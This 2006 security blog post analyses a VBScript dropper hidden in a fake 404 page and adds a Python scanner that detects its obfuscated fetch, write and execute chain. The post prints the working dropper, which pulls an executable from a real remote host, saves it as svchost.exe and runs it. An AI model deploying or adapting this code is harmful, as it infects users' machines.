Malware 2.0: Malware utilizes AJAX to install itself
By ArnY on Thursday 23 November 2006, 11:27 - security - Permalink
Well, ok, it's not really AJAX. This malware is an HTML page whose embedded VBScript uses the Microsoft.XMLHTTP object (the same XMLHttpRequest that AJAX pages use) to fetch the actual executable, writes it to the temp folder through an ADODB.Stream, and launches it with Shell.Application. Add some minor obfuscation (the "Adodb.Stream" ProgID is assembled from four string fragments) to fool antivirus products and you get W32/new-malware!Maximus on your hard drive:
```
[title][/title]
[head][/head]
[body]
[script language="VBScript"]
on error resume next
' due to how ajax works, the file MUST be within the same local domain
dl = "http://grupo-arroba.by.ru/grupo.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
' xml ajax req
str6="GET"
x.Open str6, dl, False
x.Send
' Get temp directory and create our destination name
fname1="svchost.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
' open adodb stream and write contents of request to file
' like vbs dl+exec code
S.write x.responseBody
' Saves it with CreateOverwrite flag
S.savetofile fname1,2
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
[/script]
[head]
[title][BL4CK] || 404 Not Found[/title]
[/head][body]
[center][embed xsrc="" pluginspage="" type="application/x-shockwave-flash" width="550" height="290"] [/embed]
[!-- [script]location.href='http://google.com'[/script] --]
[/body]
[/html]
```
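The string-splitting trick above defeats a naive signature that looks for the literal "Adodb.Stream". As an added example (not from the original post, nor from SecuriTeam), here is a small Python scanner that resolves simple VBScript string assignments and `&` concatenations first, then matches the fetch / write-to-disk / execute chain the post describes. The VBScript it scans is a constructed stand-in that mirrors the sample's structure with a placeholder URL; the indicator names and thresholds are my own assumptions, not anyone's product rules.

```python
import re

# Indicators of the fetch -> write -> execute chain, applied after de-obfuscation.
# Labels and patterns are assumptions chosen for this example.
INDICATORS = [
    ("xmlhttp-object", r"microsoft\.xmlhttp|msxml2\.xmlhttp|serverxmlhttp"),
    ("adodb-stream", r"adodb\.stream"),
    ("save-to-file", r"\.savetofile\b"),
    ("response-body", r"\.responsebody\b"),
    ("shell-execute", r"shell\.application|\.shellexecute\b|wscript\.shell"),
    ("filesystem-object", r"scripting\.filesystemobject"),
    ("error-suppression", r"^\s*on\s+error\s+resume\s+next"),
]
# The four indicators that together make the download-and-execute chain.
CHAIN = {"xmlhttp-object", "adodb-stream", "save-to-file", "shell-execute"}

ASSIGN_RE = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$")
STRING_RE = re.compile(r'"([^"]*)"')


def strip_comments(line):
    """Drop a trailing VBScript comment (a ' outside of a string literal)."""
    out, in_str = [], False
    for ch in line:
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            break
        out.append(ch)
    return "".join(out)


def resolve_strings(script):
    """Evaluate `name = "lit"` and `name = a & b & "c"` assignments in order.

    Only plain variable-to-string assignments are resolved; anything else
    (method calls, Set statements, property assignments) is left alone.
    """
    env = {}
    for raw in script.splitlines():
        m = ASSIGN_RE.match(strip_comments(raw))
        if not m:
            continue
        name, rhs = m.group(1).lower(), m.group(2)
        value, ok = "", True
        for part in (p.strip() for p in rhs.split("&")):
            lit = STRING_RE.fullmatch(part)
            if lit:
                value += lit.group(1)
            elif part.lower() in env:
                value += env[part.lower()]
            else:
                ok = False  # not a constant expression; skip it
                break
        if ok:
            env[name] = value
    return env


def analyze(script, decode=True):
    """Return matched indicators, a verdict, and the decoded string table."""
    env = resolve_strings(script) if decode else {}
    # Match against the script plus every decoded constant, so that a ProgID
    # built from fragments is seen exactly as CreateObject would see it.
    haystack = script + "\n" + "\n".join(env.values())
    hits = [label for label, pat in INDICATORS
            if re.search(pat, haystack, re.IGNORECASE | re.MULTILINE)]
    if CHAIN <= set(hits):
        verdict = "download-and-execute"
    elif len(hits) >= 2:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"hits": hits, "verdict": verdict, "decoded": env}


# Constructed sample mirroring the post's dropper; the URL is a placeholder.
SAMPLE = '''on error resume next
dl = "http://example.invalid/payload.exe"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
str6="GET"
x.Open str6, dl, False
x.Send
set F = df.createobject("Scripting.FileSystemObject","")
S.write x.responseBody
S.savetofile fname1,2
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
'''

# Constructed benign script: concatenation alone must not trigger anything.
BENIGN = '''Dim greeting
greeting = "Hello, " & "world"
MsgBox greeting
'''

if __name__ == "__main__":
    for name, script in (("sample", SAMPLE), ("benign", BENIGN)):
        for decode in (False, True):
            r = analyze(script, decode=decode)
            print(f"{name:7s} decode={decode!s:5s} {r['verdict']:22s} {r['hits']}")
```

Run without decoding, the sample only rates "suspicious" because "Adodb.Stream" never appears literally; with the string table resolved, all four chain indicators line up and the verdict becomes "download-and-execute". The same resolver handles the `str5=str1` aliasing the sample uses, so adding more indirection does not help the script evade.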
via securiteam